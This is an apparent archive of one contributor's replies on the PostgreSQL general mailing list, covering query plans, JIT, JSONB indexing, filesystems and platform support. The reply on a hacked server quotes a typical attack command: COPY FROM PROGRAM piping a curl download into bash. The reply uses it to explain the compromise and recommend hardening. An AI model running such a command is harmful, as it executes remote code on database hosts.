from:"Imre Samu"

Re: Conditional Tables in Postgres

2021-10-14 Thread Imre Samu

Hi Mubashir,

>  ... researching on using databases to implement network control
infrastructure.  ...
>  Are there any postgres extensions/features that implement conditional
tables

like this?

https://dl.acm.org/doi/10.1145/3472716.3472848  "Sarasate: a strong
representation system for networking policies"
*"Policy information in computer networking today is hard to manage. This
is in sharp contrast to relational data structured in a database that
allows easy access. In this demonstration, we ask why cannot (or how can)
turn network policies into relational data. Our key observation is that
oftentimes a policy does not prescribe a single ``definite'' network state,
but rather is an ``incomplete'' description of all the legitimate network
states. Based on this idea, we adopt conditional tables and the usual SQL
interface (a relational structure developed for incomplete database) as a
means to represent and query sets of network states in exactly the same way
as a single definite network snapshot. More importantly, like relational
tables that improve data productivity and innovation, relational policies
allow us to extend a rich set of data mediating methods to address the
networking problem of coordinating policies in a distributed environment."*

As I see the source code is:
https://github.com/ravel-net/Faure/blob/main/apps/README_sarasate.md
   And it is a* [ PL/python3u extension  + Z3-solver (Z3 API in Python) ]*
solution.
Probably easy to reimplement in
-  PL/Julia ( https://gitlab.com/pljulia/pljulia ) + Z3 API in Julia (
https://github.com/ahumenberger/Z3.jl )

IMHO: if you have a favorite Python/R/Julia library in this topic - you can
easily integrate it with PostgreSQL.

Regards,
  Imre


Mubashir Anwar  ezt írta (időpont: 2021. okt.
14., Cs, 21:41):

>
> Hi!
>
> I am a PhD student, researching on using databases to implement network
> control infrastructure. For this purpose, I wanted to use conditional
> tables  in
> databases, which allow representing unknown values in a DB with conditions
> over tuples. However, I could not find any DBMS that supports them. Are
> there any postgres extensions/features that implement conditional tables? I
> wanted to confirm by asking here in case I missed something in my search.
>
> Thanks in advance!
>
> Best,
> Mubashir
>

Re: ZFS filesystem - supported ?

2021-10-26 Thread Imre Samu

> Phoronix has some very useful benchmarks:
>
https://www.phoronix.com/scan.php?page=news_item&px=Linux-5.14-File-Systems
> Ext4 is much better than XFS with SQLite tests and almost equal with
> MariaDB test. PostgreSQL is a relational database (let's forget the
> object part for now) and the IO patterns will be similar to SQLite and
> MariaDB.

there is a link from the Phoronix page to the full OpenBenchmarking.org
result file
and multiple PostgreSQL 13 pgbench results included:
https://openbenchmarking.org/result/2108260-PTS-SSDS978300&sor&ppt=D&oss=postgres
( XFS, F2FS, EXT4, BTRFS )

Regards,
 Imre


Mladen Gogala  ezt írta (időpont: 2021. okt. 27.,
Sze, 1:42):

>
> On 10/26/21 05:35, Laura Smith wrote:
> > Curious, when it comes to "traditional" filesystems, why ext4 and not
> xfs ? AFAIK the legacy issues associated with xfs are long gone ?
>
> XFS is not being very actively developed any more. Ext4 is being
> actively developed and it has some features to help with SSD space
> allocation. Phoronix has some very useful benchmarks:
>
> https://www.phoronix.com/scan.php?page=news_item&px=Linux-5.14-File-Systems
>
> Ext4 is much better than XFS with SQLite tests and almost equal with
> MariaDB test. PostgreSQL is a relational database (let's forget the
> object part for now) and the IO patterns will be similar to SQLite and
> MariaDB. That benchmark is brand new, done on the kernel 5.14. Of
> course, the only guarantee is doing your own benchmark, with your own
> application.
>
> --
> Mladen Gogala
> Database Consultant
> Tel: (347) 321-1217
> https://dbwhisperer.wordpress.com
>
>
>
>

Re: Difference in execution plans pg12 vs pg14

2021-12-10 Thread Imre Samu

Hi Dmitry,

pg12:
> Execution Time: 44.123 ms

pg14:
> JIT:
>   Functions: 167
>   Options: Inlining true, Optimization true, Expressions true, Deforming
true
>   Timing: Generation 9.468 ms, Inlining 55.237 ms, Optimization 507.548
ms, Emission 347.932 ms, Total 920.185 ms
> Execution Time: 963.258 ms

please check the JIT settings ;
and test with:   jit = off;

regards,
 Imre


Дмитрий Иванов  ezt írta (időpont: 2021. dec. 11.,
Szo, 2:01):

> Afternoon. I was able to make the necessary changes to my base needed to
> migrate win_pg12 to debian pg14.
> But there is a new problem, which was not there at the initial stage so I
> checked:
>
> win_pg12:
> ->  Index Scan using index_class_tree_full on class c  (cost=0.28..2.50
> rows=1 width=235) (actual time=0.030..0.032 rows=1 loops=1)
>  Index Cond: (id = 650)
> debian_pg14:
> ->  Index Scan using index_class_tree_full on class c  (cost=0.28..2.50
> rows=1 width=235) (actual time=842.795..842.796 rows=1 loops=1)
>  Index Cond: (id = 650)
>
> I'm wondering where to dig next...
> --
> Best regards, Dmitry!
>

Re: Best Strategy for Large Number of Images

2021-12-20 Thread Imre Samu

> ... I have about 2 million images ...
> folder structure

The "Who's On First" gazetteer with ~ 26M geojson records - using 3-number
chunks subfolder structure.

"Given a Who's On First ID its (relative) URI can be derived by splitting
the ID in to 3-number chunks representing nested subdirectories, followed
by filename consisting of the ID followed by .geojson.For example the
ID for Montréal is 101736545 which becomes:   101/736/545/101736545.geojson"
https://whosonfirst.org/docs/uris/

it is working .. but this is also not optimal

"As of this writing it remains clear that this approach (lots of tiny files
parented by lots of nested directories) can be problematic. We may be
forced to choose another approach, like fewer subdirectories but nothing
has been decided and anything we do will be backwards compatible." ( from
https://whosonfirst.org/data/principles/ )

Now  the structure have been migrated to per-country repositories  (
https://whosonfirst.org/blog/2019/05/09/changes/ )
so the US structure is:
https://github.com/whosonfirst-data/whosonfirst-data-admin-us/tree/master/data
 or
https://github.com/whosonfirst-data/whosonfirst-data-admin-us/blob/master/data/907/132/693/907132693.geojson

maybe you can adopt some ideas.
imho:  with 3-number chunks representing nested subdirectories - you can
choose more file systems / hosting solutions ..

regards,
 Imre

Estevan Rech  ezt írta (időpont: 2021. dec. 20., H,
11:30):

> How is this folder structure like 10,000 folders? and the backup of it,
> how long does it take?
>

Re: How to confirm the pg_hba.conf service is correctly working

2021-12-23 Thread Imre Samu

> Have checked  select * from pg_hba_file_rules results are consistent with
pg_hba.conf
> any ip and user still can login in db

Any proxy? port/ip - forwarding running in the background?

in the next time check the "client_addr".
-  SELECT usename, client_addr FROM pg_stat_activity where client_addr is
not null ;


> a Postgres DB that was Hacked l
> When I remove pg  software and reinstall pg software

I agree with others;
- please re-install the full system!  ( not just the PostgreSQL! )

Usually, the attack sequence:
 - open port, brute force attack + COPY ... FROM PROGRAM 'curl
http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" installed and running hidden in the background.

https://dev.to/sanchitsharma/investigation-into-postgres-malware-hack-2ai0
(2020.Mar
)
https://brycematheson.io/how-to-permanently-kill-and-remove-kdevtmpfsi-kinsing/


> host   VJ   VJ_USER   10.10.10.1/32 md5

imho:
- use different ports
- change "md5" to "scram-sha-256"
- maybe:  add https://www.postgresql.org/docs/10/auth-delay.html
- for administrating use SSH tunnels:
https://www.postgresql.org/docs/10/ssh-tunnels.html  ( and use a firewall -
for closing all external ports  or use SSL )

 Regards,
   Imre


shing dong  ezt írta (időpont: 2021. dec. 23., Cs,
11:15):

> Your original post stated that you only had
>> host   VJ   VJ_USER   10.10.10.1/32 md5
>> in the pg_hba.conf file.
>> However the result of the select is considerably more ?
>
>
>
> DEAR
>
> I  have tested this feature  ,  only had
>
> host   VJ   VJ_USER   10.10.10.1/32 md5
>
> in the pg_hba.conf file
>
> Have checked  select * from pg_hba_file_rules results are consistent with
> pg_hba.conf
>
> any ip and user still can login in db
>
> When I remove pg  software and reinstall pg software  ,  the function of
> pg_hba is working ,represent  that the location and content of
> pg_hba.conf are correct
>
> Suspect that the function of pg_hba  is destroyed?
>
>
>
>
>
>
>
>
>
>
> Dave Cramer  於 2021年12月22日 週三 下午6:58寫道：
>
>>
>>
>> On Tue, 21 Dec 2021 at 22:57, shing dong  wrote:
>>
>>> *Dear  Dave *
>>>
>>> The result after reload is
>>>
>>> 2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19
>>> 13:41:35 -04,,0,LOG,0,"received SIGHUP, reloading configuration
>>> files",""
>>>
>>> No other error message
>>>
>>> --
>>>
>>> result of  select * from pg_hba_file_rules
>>>
>>>
>>>
>>> line_number,type,database,user_name,address,netmask,auth_method,options,error
>>> 84,local,{all},{all},,,md5,,
>>> 86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
>>> 87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
>>> 88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
>>> 89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
>>> 92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
>>> 93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
>>> 94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,
>>>
>>> 95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
>>>
>>> 96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
>>> 99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
>>> 100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
>>> 101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
>>> 102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
>>> 103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
>>> 104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
>>> 105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
>>> 106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
>>> 107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
>>> 108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
>>> 109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
>>> 110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
>>> 111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
>>> 112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
>>> 113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
>>> 114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
>>> 115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
>>> 116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
>>> 117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
>>> 118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
>>> 119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
>>> 120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
>>> 121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
>>> 122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
>>> 12

Re: SELECT with LIKE clause makes full table scan

2022-01-26 Thread Imre Samu

> We face in a PostgreSQL 11.4 installation on a potent Linux host a
> ...
> Why is this (ignoring the Index) and what could be done?

IMHO: 11.4 is very old.  ( Release date: 2019-06-20 ) and missing a lot of
patches.
The latest patch release is 11.14  ( see
https://www.postgresql.org/docs/11/release.html )

You can test the PG11.14 with the PostgreSQL docker image (
https://hub.docker.com/_/postgres )
- docker pull postgres:11.14-bullseye
- import table ( d01buch )
- create indexes
- test your query

Regards,
 Imre

Matthias Apitz  ezt írta (időpont: 2022. jan. 26., Sze,
11:55):

>
> Hello,
>
> We face in a PostgreSQL 11.4 installation on a potent Linux host a
> serious performance degree.
>
> A SELECT with a LIKE clause on a table with ca. 5.200.000 rows on a
> column with an Index ignores this and does a full table scan:
>
> sisis=# explain (analyze, buffers) select * from d01buch where d01ort like
> 'Z 9610%' ;
> QUERY PLAN
>
> ---
> Gather (cost=1000.00..680262.71 rows=510 width=952) (actual
> time=1324.096..1349.429 rows=1 loops=1)
> Workers Planned: 4
> Workers Launched: 4
> Buffers: shared hit=102040 read=560674
> -> Parallel Seq Scan on d01buch (cost=0.00..679211.71 rows=128 width=952)
> (actual time=1117.663..1315.062 rows=0 loops=5)
> Filter: (d01ort ~~ 'Z 9610%'::text)
> Rows Removed by Filter: 1055853
> Buffers: shared hit=102040 read=560674
> Planning Time: 2.028 ms
> Execution Time: 1349.593 ms
> (10 Zeilen)
>
> Why is this (ignoring the Index) and what could be done?
>
> Thanks
>
> matthias
>
>
> --
> Matthias Apitz, ✉ g...@unixarea.de, http://www.unixarea.de/
> +49-176-38902045
> Public GnuPG key: http://www.unixarea.de/key.pub
>
>
>

Re: increasing effective_cache_size slows down join queries by a factor of 4000x

2022-02-02 Thread Imre Samu

> Question: are there other ways to give PostgreSQL a hint

What you your pg version?

Maybe with pg_hint_plan extension ( https://github.com/ossc-db/pg_hint_plan
)
"pg_hint_plan makes it possible to tweak PostgreSQL execution plans using
so-called "hints" in SQL comments, like /*+ SeqScan(a) */."

regards,
 Imre



Artyom Shaposhnikov  ezt írta (időpont: 2022. febr. 2.,
Sze, 20:05):

> I recently moved a postgres DB to a more powerful server with 1TB of
> RAM instead of 64GB before. To my surprise after running the tuning on
> the new server, the performance of joins deteriorated by 4000x
> compared to the old server. I carefully examined all of the changes
> and found the culprit:
>
> if I use the effective_cache_size > 25GB, the query plan used is this:
>
> Limit (cost=124.12..590.33 rows=1000 width=205) (actual
> time=42326.662..42336.212 rows=1000 loops=1)
> -> Nested Loop (cost=124.12..31909018.46 rows=68443040 width=205)
> (actual time=42326.660..42336.127 rows=1000 loops=1)
> -> Merge Join (cost=124.12..30710356.97 rows=68443040 width=169)
> (actual time=42326.613..42332.764 rows=1000 loops=1)
> Merge Cond: (d.id = dc.data_id)
> -> Nested Loop (cost=1.00..31036282.72 rows=58785023 width=165)
> (actual time=0.042..5.533 rows=854 loops=1)
> -> Index Scan using data_pkey on data t (cost=0.57..4787030.00
> rows=58785023 width=131) (actual time=0.023..0.526 rows=854 loops=1)
> Index Cond: (id > 205284974)
> -> Index Scan using user_pkey on data_user u (cost=0.43..0.45 rows=1
> width=42) (actual time=0.005..0.005 rows=1 loops=854)
> Index Cond: (id = d.user_id)
> -> Index Only Scan using data_class_pkey on data_class ta
> (cost=0.57..4935483.78 rows=216964862 width=8) (actual
> time=0.018..35022.908 rows=151321889 loops=1)
> Heap Fetches: 151321889
> -> Index Scan using class_id_index on class a (cost=0.00..0.02 rows=1
> width=44) (actual time=0.003..0.003 rows=1 loops=1000)
> Index Cond: (id = dc.class_id)
> Planning Time: 4.114 ms
> Execution Time: 42336.397 ms
>
> and it is 4000x slower than the query plan used with the lower
> effective_cache_size that uses indexes instead of the merge joins:
>
> Limit (cost=1.57..4832.30 rows=1000 width=205) (actual
> time=0.081..10.457 rows=1000 loops=1)
> -> Nested Loop (cost=1.57..330629805.46 rows=68443040 width=205)
> (actual time=0.080..10.378 rows=1000 loops=1)
> -> Nested Loop (cost=1.57..267793481.39 rows=68443040 width=169)
> (actual time=0.065..7.496 rows=1000 loops=1)
> -> Nested Loop (cost=1.00..100917823.18 rows=58785023 width=165)
> (actual time=0.040..5.424 rows=854 loops=1)
> -> Index Scan using data_pkey on data t (cost=0.57..21427806.53
> rows=58785023 width=131) (actual time=0.024..0.482 rows=854 loops=1)
> Index Cond: (id > 205284974)
> -> Index Scan using user_pkey on data_user u (cost=0.43..1.35 rows=1
> width=42) (actual time=0.005..0.005 rows=1 loops=854)
> Index Cond: (id = d.user_id)
> -> Index Only Scan using data_class_pkey on data_class ta
> (cost=0.57..2.80 rows=4 width=8) (actual time=0.002..0.002 rows=1
> loops=854)
> Index Cond: (data_id = d.id)
> Heap Fetches: 1000
> -> Index Scan using class_id_index on class a (cost=0.00..0.92 rows=1
> width=44) (actual time=0.002..0.002 rows=1 loops=1000)
> Index Cond: (id = dc.class_id)
> Planning Time: 5.074 ms
> Execution Time: 10.614 ms
>
> query:
>
> explain analyze select d.time as time,d.id as id, u.username as
> username, a.query_symbol as query_symbol from data as d, data_user as
> u, class as a, data_class as dc
>where dc.class_id = a.id and dc.data_id = d.id and d.user_id = u.id
> and d.id > 205284974
>  order by d.id
>  limit 1000;
>
> I found a way to fix it by creating a distinct statistics on the
> largest join table:
>
> create statistics stat_data_class (ndistinct) on data_id, class_id
> from data_class;
> analyze data_class;
>
> Question: are there other ways to give PostgreSQL a hint to use the
> indexes instead of the merge join plan without artificially lowering
> the memory available in the parameter effective_cache_size or creating
> the additional statistics on the table?
>
> Thank you,
>
> -Art
>
>
>

Re: Can we go beyond the standard to make Postgres radically better?

2022-02-11 Thread Imre Samu

> Give me a couple million bucks, and I’ll hire some of the Postgres devs
to build a new database.
> We could crib some of the low-level code from Postgres, but everything
above the low level would need to be rewritten.

You can check the EdgeDB experiments:https://www.edgedb.com/
*"What is EdgeDB? EdgeDB is a new kind of database that takes the best
parts of relational databases, graph databases, and ORMs. We call it a
graph-relational database."*
*"EdgeDB uses PostgreSQL as its data storage and query execution engine,
benefitting from its exceptional reliability."*
-  (2022) https://www.edgedb.com/blog/edgedb-1-0
-  (2019) We Can Do Better Than SQL:
https://www.edgedb.com/blog/we-can-do-better-than-sql
"The questions we often hear are “Why create a new query language?” and
“What’s wrong with SQL?”. This post contains answers to both. ... "
- EdgeQL:   https://www.edgedb.com/docs/edgeql/index *"EdgeQL is a
spiritual successor to SQL designed with a few core principles in mind."*
- GraphQL:  https://www.edgedb.com/docs/graphql/index   EdgeDB supports
GraphQL queries natively out of the box.
- Github: https://github.com/edgedb/edgedb

EdgeQL example from the blog;

select
  Movie {
title,
rating := math::mean(.ratings.score)
actors: {
  name
} order by @credits_order
  limit 5,
  }
filter
  "Zendaya" in .actors.name


Regards,
 Imre



Guyren Howe  ezt írta (időpont: 2022. febr. 11., P, 7:43):

> I get all this. Give me a couple million bucks, and I’ll hire some of the
> Postgres devs to build a new database. We could crib some of the low-level
> code from Postgres, but everything above the low level would need to be
> rewritten.
>
> I was proposing more that we at least provide higher-level, more general,
> orthogonal etc features in the SQL we have now. eg first-class functions
> could be added to SQL reasonably easily.
> On Feb 10, 2022, 22:32 -0800, Tom Lane , wrote:
>
> Raymond Brinzer  writes:
>
> Will it be accepted here? I don't know; I'm not an insider, or in a
> position to say. But it'd be a much better pitch than a pep talk, or
> speaking in generalities about SQL. And that's coming from someone who
> actually agrees with you. I'm 100% on board with the idea that something
> better is (badly) needed. But is the idea, here, really to talk a highly
> successful project into doing a 180 based on this sort of argument? If
> only the people writing the code saw the light, they'd go read the Datomic
> site, and start overhauling PostgreSQL?
>
>
> Nah, probably not. I mean, not only are we implementing SQL, but
> we're implementing it in C. I used better languages than C back
> in the seventies ... but here we are. Practical acceptance is
> all about infrastructure and compatible tooling, which SQL and C
> both have in spades, while academic designs really don't.
>
> Also, I fear this discussion underestimates the difficulty of
> putting some other query language on top of Postgres. I know
> you'll say "but the Berkeley guys pasted SQL onto a QUEL engine
> back when, so how hard can it be?" In the first place, that
> was done on top of maybe ten years worth of work, but now there's
> another twenty-five years of development agglomerated on top of
> that. So moving things would be more than 3X harder, even if
> you make the very-naive assumption that the difficulty is merely
> linear. In the second place, QUEL and SQL aren't that far apart
> conceptually, and yet we've still had lots of problems that can
> be traced to their incompatibilities. Something that was really
> different from SQL would be a nightmare to embed into PG. I'll
> just point out one example: if you don't like SQL's semantics for
> NULL (which no I don't much like either), changing that would
> probably require touching tens of thousands of lines of code just
> in the PG core, never mind breaking every API used by extensions.
>
> So for better or worse, Postgres is a SQL engine now. If you
> want Datalog or $other_language, you'd be better off starting
> or contributing to some other project.
>
> That's not to say that we can't do stuff around the margins.
> The idea of "select all columns except these", for instance,
> has been discussed quite a bit, and would probably happen if
> we could get consensus on the syntax. But we're not going to
> throw away thirty-five years' worth of work to chase some
> blue-sky ideas.
>
> regards, tom lane
>
>

Re: Is it possible to index "deep" into a JSONB column?

2022-05-30 Thread Imre Samu

Hi Shaheed,

> WHAT GOES HERE

imho check the:   *jsonb_path_query_array( jsonb_col,
'$.employee.*.date_of_birth' ) *

may example:

CREATE TABLE jsonb_table (
id serial primary key,
jsonb_col JSONB
);

INSERT INTO jsonb_table(jsonb_col)
VALUES
  ('{"stuff": {},"employee": {"8011":  {"date_of_birth":
"1980-01-01"},"8222": {"date_of_birth": "1982-02-02"}}}'),
  ('{"stuff": {},"employee": {"7011":  {"date_of_birth":
"1970-01-01"},"7122": {"date_of_birth": "1971-02-02"}}}'),
  ('{"stuff": {},"employee": {"a12":   {"date_of_birth":
"2000-01-01"},"b56":  {"date_of_birth": "2000-02-02"}}}')
;

select jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth' )
 from jsonb_table;

-- create index
create index jpqarr_idx
  on jsonb_table
  using gin ( jsonb_path_query_array( jsonb_col,
'$.employee.*.date_of_birth' ) );
-- tests:
select id from jsonb_table
  where jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth') @>
to_jsonb('2000-01-01'::TEXT);
;
DROP TABLE
CREATE TABLE
INSERT 0 3
+--+
|jsonb_path_query_array|
+--+
| ["1980-01-01", "1982-02-02"] |
| ["1970-01-01", "1971-02-02"] |
| ["2000-01-01", "2000-02-02"] |
+--+
(3 rows)

CREATE INDEX
++
| id |
++
|  3 |
++
(1 row)


Regards,
 Imre

Shaheed Haque  ezt írta (időpont: 2022. máj. 29.,
V, 22:53):

> Suppose I have a JSONB field called "snapshot". I can create a GIN
> index on it like this:
>
>   create index idx1 on mytable using gin (snapshot);
>
> In principle, I believe this allows index-assisted access to keys and
> values nested in arrays and inner objects but in practice, it seems
> the planner "often" decides to ignore the index in favour of a table
> scan. (As discussed elsewhere, this is influenced by the number of
> rows, and possibly other criteria too).
>
> Now, I know it is possible to index inner objects, so that is snapshot
> looks like this:
>
> {
> "stuff": {},
> "more other stuff": {},
> "employee": {
>  "1234": {"date_of_birth": "1970-01-01"},
>  "56B789": {"date_of_birth": "1971-02-02"},
> }
> }
>
> I can say:
>
>   create index idx2 on mytable using gin ((snapshot -> 'employee'));
>
> But what is the syntax to index only on date_of_birth? I assume a
> btree would work since it is a primitive value, but WHAT GOES HERE in
> this:
>
>   create index idx3 on mytable using btree ((snapshot ->'employee' ->
> WHAT GOES HERE -> 'date_of_birth'));
>
> I believe an asterisk "*" would work if 'employee' was an array, but
> here it is  nested object with keys. If it helps, the keys are
> invariably numbers (in quoted string form, as per JSON).
>
> Thanks, Shaheed
>
>
>

Re: Is it possible to index "deep" into a JSONB column?

2022-05-30 Thread Imre Samu

> In principle, I believe this allows index-assisted access to keys and
> values nested in arrays and inner objects but in practice, it seems
> the planner "often" decides to ignore the index in favour of a table
scan.

part II.  index usage ;  see  the "*Bitmap Index Scan on jpqarr_idx*"

SET enable_seqscan = OFF;
select * from jsonb_table
  where jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth') @>
to_jsonb('1971-02-02'::TEXT);
;
++---+
| id |   jsonb_col
  |
++---+
|  2 | {"stuff": {}, "employee": {"7011": {"date_of_birth": "1970-01-01"},
"7122": {"date_of_birth": "1971-02-02"}}} |
++---+
(1 row)


EXPLAIN ANALYZE select * from jsonb_table
  where jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth') @>
to_jsonb('1971-02-02'::TEXT);
;
+-+
|
QUERY PLAN
   |
+-+
| Bitmap Heap Scan on jsonb_table  (cost=3.00..4.52 rows=1 width=36)
(actual time=0.056..0.059 rows=1 loops=1)
 |
|   Recheck Cond: (jsonb_path_query_array(jsonb_col,
'$."employee".*."date_of_birth"'::jsonpath, '{}'::jsonb, false) @>
to_jsonb('1971-02-02'::text)) |
|   Heap Blocks: exact=1

   |
|   ->  *Bitmap Index Scan on jpqarr_idx * (cost=0.00..3.00 rows=1 width=0)
(actual time=0.026..0.027 rows=1 loops=1)
|
| *Index Cond: (jsonb_path_query_array(jsonb_col,
'$."employee".*."date_of_birth"'::jsonpath, '{}'::jsonb, false) @>
to_jsonb('1971-02-02'::text))* |
| Planning Time: 0.255 ms

  |
| Execution Time: 0.122 ms

   |
+-+
(7 rows)

regards,
  Imre


Imre Samu  ezt írta (időpont: 2022. máj. 30., H,
12:30):

> Hi Shaheed,
>
> > WHAT GOES HERE
>
> imho check the:   *jsonb_path_query_array( jsonb_col,
> '$.employee.*.date_of_birth' ) *
>
> may example:
>
> CREATE TABLE jsonb_table (
> id serial primary key,
> jsonb_col JSONB
> );
>
> INSERT INTO jsonb_table(jsonb_col)
> VALUES
>   ('{"stuff": {},"employee": {"8011":  {"date_of_birth":
> "1980-01-01"},"8222": {"date_of_birth": "1982-02-02"}}}'),
>   ('{"stuff": {},"employee": {"7011":  {"date_of_birth":
> "1970-01-01"},"7122": {"date_of_birth": "1971-02-02"}}}'),
>   ('{"stuff": {},"employee": {"a12":   {"date_of_birth":
> "2000-01-01"},"b56":  {"date_of_birth": "2000-02-02"}}}')
> ;
>
> select jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth' )
>  from jsonb_table;
>
> -- create index
> create index jpqarr_idx
>   on jsonb_table
>   using gin ( jsonb_path_query_array( jsonb_col,
> '$.employee.*.date_of_birth' ) );
> -- tests:
> select id from jsonb_table
>   where jsonb_path_query_array( jsonb_col, '$.employee.*.date_of_birth')
> @> to_jsonb('2000-01-01'::TEXT);
> ;
> DROP TABLE
> CREATE TABLE
> INSERT 0 3
> +--+
> |jsonb_path_query_array|
> +--+
> | ["1980-01-01", "1982-02-02"] |
> | ["1970-01-01", "1971-02-02"] |
> | ["2000-01-01", "2000-02-02"] |
> +--+
> (3 rows)
>
> CREATE INDEX
> ++
> | id |
> ++
> |  3 |
> ++
> (1 row)
>
>
> Regards,
>  Imre
>
> Shaheed Haque  ezt írta (időpont: 2022. máj. 29.,
> V, 22:53):
>
>> Suppose I have a JSONB field called "snapshot". I can create a GIN
>> index on it like this:
>>
>>   create index idx1 on mytable using gin (snapshot);
>>
>> In principl

Re: PostgreSQL 12.2 on Linux ubuntu 20.4 / s390

2022-06-15 Thread Imre Samu

> According to the apt list for PostgreSQL there is nothing for the s390
system for version 13 and 14.

Multiple postgres docker images exist for   "OS/ARCH=linux/s390x"
- "postgres:14.3-bullseye"( debian )
- "postgres:15beta1-bullseye"  ( debian )
- "postgres:15beta1-alpine3.16"   ( alpine )
- "postgres:13.7-alpine3.16"( alpine )
- etc.
maybe useful for testing on linux/s390x
( https://hub.docker.com/_/postgres?tab=tags )

regards,
 Imre


Ian Dauncey  ezt írta (időpont: 2022. jún. 15.,
Sze, 12:59):

> According to the apt list for PostgreSQL there is nothing for the s390
> system for version 13 and 14.
>
>
>
> # sudo apt list postgresql-14 -a
>
> Listing... Done
>
>
>
> # sudo apt list postgresql-13 -a
>
> Listing... Done
>
>
>
> But for version 12 there is
>
>
>
> # sudo apt list postgresql-12 -a
>
> Listing... Done
>
> postgresql-12/focal-updates,focal-security,now 12.11-0ubuntu0.20.04.1
> s390x [installed]
>
> postgresql-12/focal 12.2-4 s390x
>
>
>
> Regards
>
> Ian
>
>
>
> *From:* Ray O'Donnell 
> *Sent:* Wednesday, 15 June 2022 10:12
> *To:* Ian Dauncey ;
> pgsql-general@lists.postgresql.org
> *Subject:* Re: PostgreSQL 12.2 on Linux ubuntu 20.4 / s390
>
>
>
> External email - treat with caution
>
> On 15 June 2022 08:31:42 Ian Dauncey  wrote:
>
> Morning all
>
>
>
> Currently we are running PostgreSQL 12.2 on Ubuntu 20.04.1 LTS (Kernel:
> Linux 5.4.0-42-generic - Architecture: s390x).
>
>
>
> We are looking at upgrading to a later version of PostgreSQL
>
>
>
> My question is :- What is the latest available version of PostgreSQL that
> will run on the above Architecture.
>
>
>
> Here you go:
>
>
>
> https://wiki.postgresql.org/wiki/Apt
>
>
>
> Ray.
>
>
>
>
>
>
>
>
>
>
>
> Regards
>
> Ian
>
>
>
> *Disclaimer*
>
> The information contained in this communication from the sender is
> confidential. It is intended solely for use by the recipient and others
> authorized to receive it. If you are not the recipient, you are hereby
> notified that any disclosure, copying, distribution or taking action in
> relation of the contents of this information is strictly prohibited and may
> be unlawful.
>
> This email has been scanned for viruses and malware, and may have been
> automatically archived by Mimecast, a leader in email security and cyber
> resilience. Mimecast integrates email defenses with brand protection,
> security awareness training, web security, compliance and other essential
> capabilities. Mimecast helps protect large and small organizations from
> malicious activity, human error and technology failure; and to lead the
> movement toward building a more resilient world. To find out more, visit
> our website.
>
>
>
>
> *Disclaimer*
>
> The information contained in this communication from the sender is
> confidential. It is intended solely for use by the recipient and others
> authorized to receive it. If you are not the recipient, you are hereby
> notified that any disclosure, copying, distribution or taking action in
> relation of the contents of this information is strictly prohibited and may
> be unlawful.
>
> This email has been scanned for viruses and malware, and may have been
> automatically archived by Mimecast, a leader in email security and cyber
> resilience. Mimecast integrates email defenses with brand protection,
> security awareness training, web security, compliance and other essential
> capabilities. Mimecast helps protect large and small organizations from
> malicious activity, human error and technology failure; and to lead the
> movement toward building a more resilient world. To find out more, visit
> our website.
>

Re: Question about attention to pgsql-hack...@lists.postgresql.org

2022-06-27 Thread Imre Samu

>From the original post
"-This whole system will uphold any precision, certainly ones within a very
large range limit, controlled by the already available type for large
positive integers, the BIGINT. It can thereby enumerate digits within the
range of
(+/-)1 to (+/-)9,223,372,036,854,775,807. This is at least between one and
positive nine quintilion digit places. More than enough for the speed and
scope of today, or maybe tomorrow, and the Desktop PC, as either a client
or a server."

As I know PostgreSQL 14 "field" size upper limit : 1 GB   ~=  1 000 000 000
byte  ( 1 byte --> 2 digits )
so this is a hard limitation on the PostgreSQL side.
https://www.postgresql.org/docs/current/limits.html

proposal for the first iteration:
- just using the Postgres "numeric" type (  "up to 131072 digits before the
decimal point; up to 16383 digits after the decimal point" )
  and it will be so much easier.

> I was wondering if anyone can or will pay some active attention to it?

Why is this important to you?
How are you expected to contribute to the proposed project?
What technical background do you have?

Regards,
 Imre


A Z  ezt írta (időpont: 2022. jún. 26., V, 12:37):

> Dear pgsql-general,
>
> I have successfully sent an (updated) email list message to
>
> *pgsql-hack...@lists.postgresql.org *
>
> which can be viewed in the archive here:
>
>
